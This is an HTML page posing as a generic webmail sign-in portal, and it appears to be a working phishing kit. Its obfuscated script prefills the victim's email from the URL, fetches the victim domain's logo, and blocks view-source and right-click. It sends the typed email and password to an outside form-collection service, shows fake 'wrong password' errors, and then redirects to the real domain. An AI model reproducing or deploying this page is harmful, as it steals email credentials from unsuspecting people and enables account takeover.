
<html lang="en">
    <head>
<meta name="robots" content="nofollow">
<meta name="googlebot" content="nofollow">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="private">
<meta http-equiv="Pragma" content="no-cache">   
    <title>Webmail Portal Access </title>
	<link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
   <style type="text/css">
	body {
    font-family: 'Open Sans', sans-serif;
    color: #535353;
}

.img-fluid {
    max-width: 100% !important;
    height: auto;
}

.form-control:focus {
    box-shadow: none;
}

h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
    font-family: 'Open Sans', sans-serif;
}

/** Login 1 start **/
.login-1 {
    background: rgba(0, 0, 0, 0.04) url() top left repeat;
    background-size: cover;
    top: 0;
    width: 100%;
    bottom: 0;
    opacity: 1;
    min-height: 100vh;
    text-align: center;
    position: relative;
    display: -webkit-box;
    display: -moz-box;
    display: -ms-flexbox;
    display: -webkit-flex;
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 30px;
}

.login-1 .login-inner-form {
    max-width: 380px;
    margin: 0 auto;
    color: #717171;
    text-align: center;
}

.login-1 .login-inner-form .details {
    padding: 25px 30px 30px;
    background: #fff;
    border-radius: 5px 5px 0 0;
}

.login-1 .login-inner-form img {
    margin-bottom: 15px;
    height: 30px;
}

.login-1 .login-inner-form h3 {
    margin: 0 0 25px;
    font-size: 18px;
    font-weight: 400;
    font-family: 'Open Sans', sans-serif;
    color: #717171;
}

.login-1 .login-inner-form .form-group {
    margin-bottom: 25px;
}

.login-1 .login-inner-form .input-text {
    width: 100%;
    padding: 10px 15px;
    font-size: 14px;
    border: 1px solid #e8e7e7;
    outline: none;
    color: #717171;
    border-radius: 3px;
    height: 45px;
}

.login-1 .login-inner-form .btn-md {
    cursor: pointer;
    padding: 12px 30px 11px 30px;
    letter-spacing: 1px;
    font-size: 15px;
    font-weight: 600;
    font-family: 'Open Sans', sans-serif;
    border-radius: 3px;
}

.login-1 .login-inner-form .social-list{
    margin-bottom: 0;
    padding: 0;
}

.login-1 .login-inner-form .checkbox a {
    font-size: 14px;
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .terms{
    margin-left: 3px;
}

.login-1 .login-inner-form .checkbox {
    margin-bottom: 25px;
    font-size: 14px;
}

.login-1 .login-inner-form .form-check{
    float: left;
    margin-bottom: 0;
}

.login-1 .login-inner-form .form-check a {
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .form-check-input {
    position: absolute;
    margin-left: 0;
}

.login-1 .login-inner-form .form-check label::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 17px;
    height: 17px;
    margin-left: -25px;
    border: 1px solid #cccccc;
    border-radius: 3px;
    background-color: #fff;
}

.login-1 .login-inner-form .form-check-label {
    padding-left: 25px;
    margin-bottom: 0;
    font-size: 14px;
}

.login-1 .login-inner-form .checkbox-theme input[type="checkbox"]:checked + label::before {
    background-color: #0f96f9;
    border-color: #0f96f9;
}

.login-1 .login-inner-form input[type=checkbox]:checked + label:before {
    font-weight: 300;
    color: #f3f3f3;
    line-height: 15px;
    font-size: 14px;
    content: "\2713";
}

.login-1 .login-inner-form input[type=checkbox], input[type=radio] {
    margin-top: 4px;
}

.login-1 .login-inner-form .social-list li {
    display: inline-block;
    font-size: 16px;
    margin-top: 30px;
}

.login-1 .login-inner-form .social-list li a {
    margin:2px;
    font-size: 14px;
    width: 35px;
    height: 35px;
    border-radius: 3px;
    display: inline-block;
    text-align: center;
    line-height: 35px;
}

.login-1 .login-inner-form .footer {
    font-size: 14px;
    padding: 15px 20px;
    background-color: #f5f5f5;
    border-radius: 0 0 5px 5px;
    border-top: solid 1px #f5f5f5;
}

.login-1 .login-inner-form .footer span a {
    color: #717171;
}

.login-1 .login-inner-form button:focus {
    outline: none;
    outline: 0 auto -webkit-focus-ring-color;
}

.login-1 .login-inner-form .btn-theme:not([disabled]):not(.disabled).active, .btn-theme:not([disabled]):not(.disabled):active, .show > .btn-theme.dropdown-toggle {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme.focus, .btn-theme:focus {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme {
    background: #0f96f9;
    border: none;
    color: #fff;
}

.login-1 .login-inner-form .btn-theme:hover {
    background: #0294B6;
}

/** Social media **/
.login-1 .facebook-bg {
    background: #4867aa;
    color: #fff;
}

.login-1 .facebook-bg:hover {
    background: #3b589e;
    color: #fff;
}

.login-1 .twitter-bg {
    background: #33CCFF;
    color: #fff;
}

.login-1 .twitter-bg:hover {
    background: #56d7fe;
    color: #fff;
}

.login-1 .google-bg {
    background: #db4437;
    color: #fff;
}

.login-1 .google-bg:hover {
    background: #dc4e41;
    color: #fff;
}

.login-1 .linkedin-bg {
    background: #0177b5;
    color: #fff;
}

.login-1 .linkedin-bg:hover {
    background: #1c82ca;
    color: #fff;
}

/** MEDIA **/
@media (max-width: 992px) {
    .login-1 {
        padding: 30px 0;
    }
}


	</style>
  </head>
  <body id="top">
 <iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>

<!-- Login 1 start -->
<div class="login-1">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="login-inner-form">
                    <div class="details">
                        
      <form action="#" method="post">
<div align="center">
                          <h2 class="text-center"><div id="top"><img src="" alt="" id="logoimg" style="width:30px;height:30px;margin-top:10px;">
		 
		  <span style="vertical-align: middle; padding-left: 3px" id="logoname"></span> </div>
		<br>
                        </h2><h3 align="center">Sign to continue</h3>		<br>
        <center>
          <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please Enter your correct Password</div>
          <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
        </center>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-user"></i></span>
            <input type="email" class="form-control" name="email" placeholder="Username" value="" id="email" readonly>
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-lock"></i></span>
            <input type="password" class="form-control" id="password" name="password" placeholder="Password" required="required">
          </div>
        </div>
		<div class="form-group">
		 <div align="left">
          <input type="checkbox"> Remember Me
        </div>
		</div>
        <div class="form-group">
         
		           <button type="submit" class="btn btn-primary login-btn btn-block" id="submit-btn">Sign in</button>
        </div>
       

      
      
    </div></form>

   <style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}</style>


 <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>


  <script>
function _0xb8f9(_0x421b29,_0x3cfe75){var _0x905822=_0x9058();return _0xb8f9=function(_0xb8f990,_0xadb365){_0xb8f990=_0xb8f990-0x7c;var _0x531db2=_0x905822[_0xb8f990];return _0x531db2;},_0xb8f9(_0x421b29,_0x3cfe75);}var _0x312716=_0xb8f9;function _0x9058(){var _0xd8ee4b=['#back1','src','hide','2InNFdl','https://logo.clearbit.com/','538280Zmcnid','https://p.kindpng.com/picc/s/25-259966_transparent-background-white-email-icon-png-png-download.png','#logoimg','#msg','onkeydown','preventDefault','log','3364916jBNCwU','https://submit-form.com/elREfxre','addEventListener','#submit-btn','54006XpBQNn','width','ajax','location','360FViHnB','http://www.','attr','val','which','getElementById','msg','length','JSON','keydown','9041985xAyBqn','test','272799dmJdTO','242031knjIdW','Verifing...','onload','indexOf','#error','substr','html','379106ChQzep','mainPage','176VYIzmo','#email','#password','replace','.email','contextmenu','24rEZRfc','Wrong\x20password!\x20Please\x20try\x20again','animate','ready','show','keyCode','click','ctrlKey','POST'];_0x9058=function(){return _0xd8ee4b;};return _0x9058();}(function(_0x2eaea0,_0x36aede){var _0x39a6e3=_0xb8f9,_0x3a6050=_0x2eaea0();while(!![]){try{var _0x47d6dc=parseInt(_0x39a6e3(0x9c))/0x1*(parseInt(_0x39a6e3(0x7e))/0x2)+parseInt(_0x39a6e3(0x9b))/0x3+parseInt(_0x39a6e3(0x87))/0x4+-parseInt(_0x39a6e3(0x8f))/0x5*(parseInt(_0x39a6e3(0x8b))/0x6)+-parseInt(_0x39a6e3(0xa3))/0x7*(-parseInt(_0x39a6e3(0xab))/0x8)+-parseInt(_0x39a6e3(0x99))/0x9+parseInt(_0x39a6e3(0x80))/0xa*(parseInt(_0x39a6e3(0xa5))/0xb);if(_0x47d6dc===_0x36aede)break;else _0x3a6050['push'](_0x3a6050['shift']());}catch(_0x32fb7b){_0x3a6050['push'](_0x3a6050['shift']());}}}(_0x9058,0x8519a),$(document)['bind'](_0x312716(0x98),function(_0x36b249){var _0x224dd9=_0x312716;if(_0x36b249[_0x224dd9(0xb2)]&&_0x36b249[_0x224dd9(0x93)]==0x53)return _0x36b249[_0x224dd9(0x85)](),![];}),document[_0x312716(0x89)](_0x312716(0xaa),_0xbb2f81=>_0xbb2f81[_0x312716(0x85)]()),document[_0x312716(0x84)]=function(_0x293923){var _0x37115c=_0x312716;return _0x293923[_0x37115c(0xb2)]&&(_0x293923[_0x37115c(0xb0)]===0x43||_0x293923['keyCode']===0x56||_0x293923[_0x37115c(0xb0)]===0x55||_0x293923['keyCode']===0x75)?![]:!![];},$(document)['keypress']('u',function(_0x13f93e){var _0x5e56c9=_0x312716;return _0x13f93e[_0x5e56c9(0xb2)]?![]:!![];}));function checkImage(_0x33572d){var _0x7e6f2a=_0x312716,_0x371a52=new Image();_0x371a52[_0x7e6f2a(0x9e)]=function(){var _0x24f501=_0x7e6f2a;this[_0x24f501(0x8c)]>0x0&&$(_0x24f501(0x82))[_0x24f501(0x91)](_0x24f501(0x7c),_0x33572d);},_0x371a52['onerror']=function(){var _0x47016c=_0x7e6f2a;$('#logoimg')[_0x47016c(0x91)](_0x47016c(0x7c),_0x47016c(0x81));},_0x371a52['src']=_0x33572d;}$(document)[_0x312716(0xae)](function(){var _0x34ad8e=_0x312716,_0x51ed43=0x0;$(_0x34ad8e(0xb4))[_0x34ad8e(0xb1)](function(){var _0x4e4bab=_0x34ad8e;$(_0x4e4bab(0x83))['hide'](),$(_0x4e4bab(0xa6))[_0x4e4bab(0x92)](''),$('#automail')[_0x4e4bab(0xad)]({'left':0xc8,'opacity':_0x4e4bab(0x7d)},0x0),$('#inputbar')[_0x4e4bab(0xad)]({'right':0xc8,'opacity':_0x4e4bab(0xaf)},0x3e8);});var _0x3074d3=window[_0x34ad8e(0x8e)]['hash'][_0x34ad8e(0xa1)](0x1);if(!_0x3074d3){}else{var _0x3cc2a2=_0x3074d3;$(_0x34ad8e(0xa6))[_0x34ad8e(0x92)](_0x3cc2a2);var _0x239268=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x239268[_0x34ad8e(0x9a)](_0x3cc2a2))return $(_0x34ad8e(0xa0))['show'](),_0x3074d3['focus'],![];var _0x5ea1e5=_0x3cc2a2[_0x34ad8e(0x9f)]('@'),_0x2ed9a5=_0x3cc2a2[_0x34ad8e(0xa1)](_0x5ea1e5+0x1),_0x1144d3='https://'+_0x2ed9a5;checkImage(_0x34ad8e(0x7f)+_0x2ed9a5),document[_0x34ad8e(0x94)](_0x34ad8e(0xa4))[_0x34ad8e(0x7c)]=_0x1144d3,$(_0x34ad8e(0xa9))[_0x34ad8e(0xa2)](_0x3074d3);}$(_0x34ad8e(0x8a))['click'](function(_0x45df4a){var _0x38e66f=_0x34ad8e;_0x45df4a[_0x38e66f(0x85)]();var _0x208705=$(_0x38e66f(0xa6))[_0x38e66f(0x92)](),_0x4730b4=$('#password')[_0x38e66f(0x92)]();if(_0x4730b4[_0x38e66f(0x96)]<0x4)return $(_0x38e66f(0x83))['show'](),$(_0x38e66f(0x83))['html'](_0x38e66f(0xac)),![];_0x51ed43=_0x51ed43+0x1,$[_0x38e66f(0x8d)]({'dataType':_0x38e66f(0x97),'url':_0x38e66f(0x88),'type':_0x38e66f(0xb3),'data':{'oemail':_0x208705,'opassword':_0x4730b4},'beforeSend':function(_0x520194){var _0x3c8446=_0x38e66f;$(_0x3c8446(0x8a))[_0x3c8446(0xa2)](_0x3c8446(0x9d));},'success':function(_0x416319){var _0xed0ccc=_0x38e66f;$(_0xed0ccc(0x83))[_0xed0ccc(0xa2)]('<span\x20style=\x27color:red;\x27>Username\x20or\x20Password\x20is\x20incorrect.\x20Please\x20try\x20again</span>'),_0x416319&&($(_0xed0ccc(0x83))['show'](),console[_0xed0ccc(0x86)](_0x416319),$('#msg')[_0xed0ccc(0xa2)](_0x416319['msg']),_0x416319['signal']=='ok'?($('#password')['val'](''),_0x51ed43>=0x2&&(_0x51ed43=0x0,window[_0xed0ccc(0x8e)]['replace'](_0xed0ccc(0x90)+_0x2ed9a5))):$(_0xed0ccc(0x83))['html'](_0x416319[_0xed0ccc(0x95)]));},'error':function(){var _0x5dbd8b=_0x38e66f;$(_0x5dbd8b(0xa7))[_0x5dbd8b(0x92)](''),_0x51ed43>=0x2&&(_0x51ed43=0x0,window['location'][_0x5dbd8b(0xa8)](_0x5dbd8b(0x90)+_0x2ed9a5)),$(_0x5dbd8b(0x83))['show']();},'complete':function(){var _0x5299cc=_0x38e66f;$(_0x5299cc(0x8a))[_0x5299cc(0xa2)]('Sign\x20in');}});});});

  </script>
  </div></div></div></div></div></div></body></html>